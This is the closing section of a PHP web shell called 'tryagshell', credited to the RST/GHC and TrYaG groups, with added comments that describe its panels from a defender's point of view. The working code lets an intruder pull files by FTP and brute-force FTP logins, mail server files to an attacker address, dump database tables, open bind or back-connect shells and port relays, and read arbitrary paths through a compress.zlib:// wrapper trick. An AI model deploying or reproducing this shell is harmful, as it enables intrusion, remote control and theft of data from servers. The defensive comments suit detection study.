2314 echo $te.'</div>'.$table_end1.$fe;
2315 }
2316 echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts;
2317 echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
2318 $arh = $lang[$language.'_text92'];
2319 if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
2320 if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
2321 if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
2322 echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh);
2323 echo $te.'</div>'.$table_end1.$fe;
2324 if(@function_exists("ftp_connect")){
2325 echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2326 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
2327 echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
2328 echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
2329 echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
2330 echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
2331 echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2332 echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
2333 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
2334 echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2335 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
2336 echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
2337 echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
2338 echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
2339 echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2340 echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
2341 echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
2342 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
2343 echo $te."</td>".$fe."</tr></div></table>";
2344 }
2345 if($unix && @function_exists("ftp_connect")){
2346 echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('id18').$ts;
2347 echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2348 echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
2349 echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
2350 echo $te.'</div>'.$table_end1.$fe;
2351 }
2352 if(@function_exists("mail")){
2353 echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2354 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
2355 echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
2356 echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
2357 echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
2358 echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
2359 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
2360 echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2361 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
2362 echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
2363 echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
2364 echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from tryagshell"))));
2365 echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2366 echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh);
2367 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
2368 echo $te."</td>".$fe."</tr></div></table>";
2369 }
2370 if($mysql_on||$mssql_on||$pg_on||$ora_on)
2371 {
2372 $select = '<select name=db>';
2373 if($mysql_on) $select .= '<option>MySQL</option>';
2374 if($mssql_on) $select .= '<option>MSSQL</option>';
2375 if($pg_on)    $select .= '<option>PostgreSQL</option>';
2376 if($ora_on)   $select .= '<option>Oracle</option>';
2377 $select .= '</select>';
2378 echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2379 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
2380 echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
2381 echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2382 echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
2383 echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
2384 echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
2385 echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
2386 echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2387 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
2388 echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
2389 echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2390 echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
2391 echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
2392 echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
2393 echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
2394 }
2395 if(!$safe_mode&&!$windows){
     // Three side-by-side network panels, shown only when neither $safe_mode nor
     // $windows is set. The panel titles come from $lang entries that are not
     // visible here, so the purposes below are inferred from the field names and
     // the handlers (outside this excerpt) should be checked to confirm them.
     //   1. 'port' + 'bind_pass' (defaults 11457 / tryag): looks like a
     //      password-protected listener on the server.
     //   2. 'ip' + 'port' (the requester's REMOTE_ADDR / 11457): looks like an
     //      outbound connection from the server to the operator.
     //   3. 'local_port' + 'remote_host' + 'remote_port' (11457 / irc.dalnet.ru /
     //      6667) with datapipe.pl / datapipe.c options: looks like a port relay.
     // Each panel lets the operator choose a Perl or C implementation.
     // Defender view: alert on the web-server account running perl or a C compiler,
     // on new listening sockets owned by that account (11457 is the default here),
     // and on outbound connections from the web tier to unexpected hosts or to
     // port 6667. Default-deny egress filtering for web servers blocks panels 2
     // and 3 outright.
2396 echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
2397 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
2398 echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
2399 echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'tryag'));
2400 echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
2401 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
2402 echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2403 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
2404 echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
2405 echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
2406 echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
2407 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
2408 echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2409 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
2410 echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
2411 echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
2412 echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
2413 echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
2414 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
2415 echo $te."</td>".$fe."</tr></div></table>";
2416 }
2417 echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ tryagshell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---o</b></font></div></td></tr></table>".$f;
2418 $u1p=""; // File to Include... or use _GET _POST
2419 $tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
     // Trailing file viewer appended after the main page. The path to read is taken
     // from the hard-coded $u1p above, else from the 'u1p' GET parameter, else from
     // the 'u1p' POST field. $tymczas (Polish for "temporary") is the directory
     // handed to tempnam(). With no path supplied, die() prints the author banner
     // and ends the response at that point.
     // Defender view: requests carrying a 'u1p' parameter whose value is a
     // filesystem path are the signal in web logs. Forms earlier on the page
     // prefill it with /etc/passwd.
2420 echo "<PRE>\n";
2421 if(empty($u1p)){
2422 if(empty($_GET['u1p'])){
2423 if(empty($_POST['u1p'])){
2424 die("<table Width='100%' height='7%' bgcolor='#8C0404' border='1'>
2425 <tr>
2426 <td><center><font size='3' color='#BBB516'> By  * Mohajer22-TrYaG Team * * <a href=http://www.tryag.com>http://www.tryag.com</a> | <a href=http://www.dwrat.com>http://www.dwrat.com</a></center></td>
2427 </tr>
2428 </table></FONT>");
2429 } else {
2430 $u1p=$_POST['u1p'];
2431 }
2432 } else {
2433 $u1p=$_GET['u1p'];
2434 }
2435 }
     // The file is not opened directly: it is copied through the compress.zlib://
     // stream wrapper into a temp file with the prefix "cx", read back, printed
     // HTML-escaped, and the temp file is removed.
     // NOTE(review): the wrapper is presumably there to get around path
     // restrictions on older PHP builds; confirm against the PHP version in use.
     // A stream-wrapper prefix in front of a request-derived path is worth flagging
     // in code review and in static scans.
     // Forensic note: tempnam() creates the file before copy() runs, and the
     // failure branch exits without unlink(), so failed reads leave empty "cx"
     // prefixed files behind. With $tymczas empty these would normally land in the
     // system temp directory.
2436 $temp=tempnam($tymczas, "cx");
2437 if(copy("compress.zlib://".$u1p, $temp)){
2438 $zrodlo = fopen($temp, "r");
2439 $tekst = fread($zrodlo, filesize($temp));
2440 fclose($zrodlo);
2441 echo "".htmlspecialchars($tekst)."";
2442 unlink($temp);
2443 } else {
2444 die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
2445 <B>".htmlspecialchars($u1p)."</B> dosen't exists or you don't have
2446 access.</CENTER></FONT>");
2447 }
2448 ?>

Tryagshell v1.3 screenshot

tryagshell screenshot